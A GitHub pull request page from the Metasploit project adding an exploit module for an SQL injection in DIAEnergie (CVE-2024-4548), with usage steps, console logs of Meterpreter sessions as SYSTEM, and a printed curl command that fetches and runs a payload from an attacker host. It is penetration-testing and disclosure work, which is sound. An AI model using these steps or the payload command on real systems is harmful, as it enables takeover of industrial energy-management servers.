Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

DIAEnergie SQL Injection (CVE-2024-4548) #19351

Merged
merged 15 commits into from
Aug 21, 2024
Merged

DIAEnergie SQL Injection (CVE-2024-4548) #19351

merged 15 commits into from
Aug 21, 2024

Conversation

h4x-x0r
Copy link
Contributor

@h4x-x0r h4x-x0r commented Jul 30, 2024

This is a new module which exploits an unauthenticated SQL injection vulnerability in DIAEnergie <= v1.10 (CVE-2024-4548).

Successful exploitation allows to gain code execution in the context of NT AUTHORITY\SYSTEM.

Verification Steps

  1. Install SQL Server. The Express version is sufficient (tested with 2019 and 2022).
  2. Install the application from the vendor.
  3. Run Metasploit:
  • Start msfconsole and enter the following commands
  • use exploit/windows/scada/diaenergie_sqli
  • set RHOSTS <IP> (e.g., set RHOSTS 192.168.1.245)
  • exploit

This should result in a meterpreter session:

msf6 exploit(windows/scada/diaenergie_sqli) > exploit 

[*] Started reverse TCP handler on 192.168.1.241:4444 
[*] 192.168.1.245:928 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.1.245:928 - The target appears to be vulnerable.
[*] 192.168.1.245:928 - Sending SQL injection...
[*] 192.168.1.245:928 - Triggering script execution...
[*] 192.168.1.245:928 - Cleaning up database...
[+] 192.168.1.245:928 - Script successfully injected, check thy shell.
[*] Sending stage (201798 bytes) to 192.168.1.245
[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.245:50605) at 2024-07-29 23:59:53 -0400

meterpreter > shell
Process 6392 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4529]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

Successfully tested on

Tested in the following deployments, with both the curl and certutil fetch commands.

  • DIAEnergie v1.10 on Windows 10 22H2
  • DIAEnergie v1.9 on Windows 10 22H2

@Admin9961
Copy link

Can you explain how did you obtained code execution? SQLi can usually dump user tables and password hashes but executing arbitrary code is not always possible... There are misconfigured permissions to allow code execution?

@h00die
Copy link
Contributor

h00die commented Jul 31, 2024

Can you explain how did you obtained code execution? SQLi can usually dump user tables and password hashes but executing arbitrary code is not always possible... There are misconfigured permissions to allow code execution?

https://github.com/rapid7/metasploit-framework/pull/19351/files#diff-f8822c9d9d61a2c7fae0163664564a5c4188ee558d1e41dc04fc42949cbdcc5aR98

h4x-x0r and others added 11 commits August 1, 2024 23:55
@h4x-x0r
Exploit Module for Calibre Python Code Injection (CVE-2024-6782)
1fbeb4e
@h4x-x0r
Documentation for Exploit Module Calibre Python Code Injection (CVE-2…
6aa4d2e 
…024-6782)
@h4x-x0r
Merge branch 'rapid7:master' into my_awesome_branch
80961b0
@h4x-x0r
Delete documentation/modules/exploit/multi/misc/calibre_exec.md
6e3f95f
@h4x-x0r
Delete modules/exploits/multi/misc/calibre_exec.rb
7bafe1c
@h4x-x0r
Calibre Python Code Injection (CVE-2024-6782)
025354b 
Exploit Module for Calibre Python Code Injection (CVE-2024-6782)
@h4x-x0r
Delete documentation/modules/exploit/multi/misc/calibre_exec.md
2b8f52b
@h4x-x0r
Delete modules/exploits/multi/misc/calibre_exec.rb
7784448
@h4x-x0r
rm calibre
c8eb919 
rm calibre
@h4x-x0r
Merge branch 'my_awesome_branch' of https://github.com/h4x-x0r/metasp…
4e8f27b 
…loit-framework into my_awesome_branch
@h4x-x0r
Minor fixes
35cbf63 
Specified a default payload
Randomized date and time
Wrapped cleanup in an ensure block
@jheysel-r7 jheysel-r7 self-assigned this Aug 2, 2024
@jheysel-r7 jheysel-r7 removed their assignment Aug 13, 2024
@dledda-r7 dledda-r7 self-assigned this Aug 14, 2024
@dledda-r7
Copy link
Contributor

I'm having some issues testing this target.
I noticed for me the exploited TCP service is binded only to localhost.
However even after doing a remote foward of the port I am getting this issue:

msf6 exploit(windows/scada/diaenergie_sqli) > exploit

[*] Command to run on remote host: curl -so %TEMP%\mnJfOecunW.exe http://192.168.136.128:8080/DeiUTq5x7uWalHO_frSVvA & start /B %TEMP%\mnJfOecunW.exe
[*] Fetch handler listening on 192.168.136.128:8080
[*] HTTP server started
[*] Adding resource /DeiUTq5x7uWalHO_frSVvA
[*] Started reverse TCP handler on 192.168.136.128:4444 
[*] 127.0.0.1:9928 - Running automatic check ("set AutoCheck false" to disable)
[*] 127.0.0.1:9928 - Who is it response: 
[-] 127.0.0.1:9928 - Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.

Am I missing something? maybe some configuration?
Thanks in advance for your help!

@h4x-x0r
Copy link
Contributor Author

h4x-x0r commented Aug 15, 2024
edited
Loading

I'm having some issues testing this target. I noticed for me the exploited TCP service is binded only to localhost. However even after doing a remote foward of the port I am getting this issue:

msf6 exploit(windows/scada/diaenergie_sqli) > exploit

[*] Command to run on remote host: curl -so %TEMP%\mnJfOecunW.exe http://192.168.136.128:8080/DeiUTq5x7uWalHO_frSVvA & start /B %TEMP%\mnJfOecunW.exe
[*] Fetch handler listening on 192.168.136.128:8080
[*] HTTP server started
[*] Adding resource /DeiUTq5x7uWalHO_frSVvA
[*] Started reverse TCP handler on 192.168.136.128:4444 
[*] 127.0.0.1:9928 - Running automatic check ("set AutoCheck false" to disable)
[*] 127.0.0.1:9928 - Who is it response: 
[-] 127.0.0.1:9928 - Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.

Am I missing something? maybe some configuration? Thanks in advance for your help!

There shouldn't be any specific configuration required. For both test environments I used a default installation without any additional steps or similar.

I do remember that it took a few minutes after system boot for the service to fully start and listen for incoming traffic. I was testing it with VMware Workstation, with a bridged and NAT configuration for the network interface. If you change the settings, you'd need to restart the service/ reboot the system so that it binds correctly to the network interfaces and IPs assigned.

Does the application itself generally work, i.e., can you connect with your browser to the web interface of the application and do a login with the default credentials (root:admin)? The web server too should be listening by default on all network interfaces and be reachable through the non-loopback address.

Which version of DIAEnergie are you testing, and on which OS? I can try to do a clean install again and rerun the module, but probably not before the weekend.

The error message you are getting (NoMethodError undefined method []' for nil:NilClass) is probably something I can try to catch regardless though to better handle that kind of situation.

@dledda-r7
Copy link
Contributor

dledda-r7 commented Aug 15, 2024
edited
Loading

Hello @h4x-x0r,
We are testing in the same env, VMWare (Fusion in my case) with NAT network adapter.
I confirm I am able to see the web-page of the DIAEnergie, only the port 928 seems to be binded specifically to localhost (I just runned netstat /a
The version I am testing is 1.10.0
OS: Windows Server 2019 (10.0 Build 17763). Resolved, issue not related to the module, more on the setup on my end.

@dledda-r7
Copy link
Contributor

After reinstalling everything again I managed to get this working. probably something broke during the installation.

msf6 exploit(windows/scada/diaenergie_sqli) > exploit

[*] Started reverse TCP handler on 192.168.136.128:4444 
[*] 192.168.136.130:928 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.136.130:928 - The target appears to be vulnerable.
[*] 192.168.136.130:928 - Sending SQL injection...
[*] 192.168.136.130:928 - Triggering script execution...
[+] 192.168.136.130:928 - Script successfully injected, check thy shell.
[*] 192.168.136.130:928 - Cleaning up database...
[*] Sending stage (290886 bytes) to 192.168.136.130
[*] Meterpreter session 1 opened (192.168.136.128:4444 -> 192.168.136.130:49849) at 2024-08-19 05:02:59 -0400

meterpreter > sysinfo
Computer        : WIN-JR5HP085VV3
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

@h4x-x0r
Copy link
Contributor Author

h4x-x0r commented Aug 19, 2024

That's great! I had reinstalled it and the module was working for me fine, but I did it on Windows 10, so I wasn't sure if it is perhaps something specific to Server 2019. Glad it is working now.

smcintyre-r7
smcintyre-r7 reviewed Aug 19, 2024
View reviewed changes
modules/exploits/windows/scada/diaenergie_sqli.rb
Comment on lines +75 to +77
if version[0].nil?
Exploit::CheckCode::Detected
end
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

When I target a service that is definitely not DIAEnergie such as SSH, this crashes.

msf6 exploit(windows/scada/diaenergie_sqli) > check

[-] 192.168.250.1:22 - Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[-] 192.168.250.1:22 - Check failed: The state could not be determined.
msf6 exploit(windows/scada/diaenergie_sqli) >

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you for pointing that out. I've tested a couple different scenarios to better handle unexpected replies.

Port closed:

msf6 exploit(windows/scada/diaenergie_sqli) > check

[-] 192.168.15.16:12345 - The connection was refused by the remote host (192.168.15.16:12345).
[*] 192.168.15.16:12345 - Cannot reliably check exploitability.

Port open but random service that replies with a reset:

msf6 exploit(windows/scada/diaenergie_sqli) > check

[-] 192.168.15.16:631 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[-] 192.168.15.16:631 - Check failed: The state could not be determined.

Port open but random service that returns an empty response (the case that you triggered):

msf6 exploit(windows/scada/diaenergie_sqli) > check

[*] 192.168.15.16:5433 - Received an empty response
[*] 192.168.15.16:5433 - Cannot reliably check exploitability.

I also removed some of the nesting that I had as you suggested in one of my other PRs.

@h4x-x0r
Error handling and code cleanup
362b242 
Error handling and code cleanup
dledda-r7
dledda-r7 approved these changes Aug 20, 2024
View reviewed changes
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Retested after the changes. Looks good to me.

msf6 exploit(windows/scada/diaenergie_sqli) > exploit

[*] Started reverse TCP handler on 192.168.136.128:4444
[*] 192.168.136.130:928 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.136.130:928 - The target appears to be vulnerable.
[*] 192.168.136.130:928 - Sending SQL injection...
[*] 192.168.136.130:928 - Triggering script execution...
[+] 192.168.136.130:928 - Script successfully injected, check thy shell.
[*] 192.168.136.130:928 - Cleaning up database...
[*] Sending stage (290886 bytes) to 192.168.136.130
[*] Meterpreter session 1 opened (192.168.136.128:4444 -> 192.168.136.130:49972) at 2024-08-20 05:29:26 -0400

meterpreter > sysinfo
Computer        : WIN-JR5HP085VV3
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

@dledda-r7 dledda-r7 merged commit 35da466 into rapid7:master Aug 21, 2024
39 checks passed
@dledda-r7
Copy link
Contributor

dledda-r7 commented Aug 21, 2024
edited by adfoster-r7
Loading

Release Notes

This adds an exploit module for CVE-2024-4548, an unauthenticated SQL Injection vulnerability able to achieve remote code execution as NT AUTHORITY\SYSTEM.

@dledda-r7 dledda-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 21, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@adfoster-r7 adfoster-r7 adfoster-r7 left review comments

@smcintyre-r7 smcintyre-r7 smcintyre-r7 left review comments

@dledda-r7 dledda-r7 dledda-r7 approved these changes

Assignees

@dledda-r7 dledda-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
7 participants
@h4x-x0r @Admin9961 @h00die @dledda-r7 @smcintyre-r7 @adfoster-r7 @jheysel-r7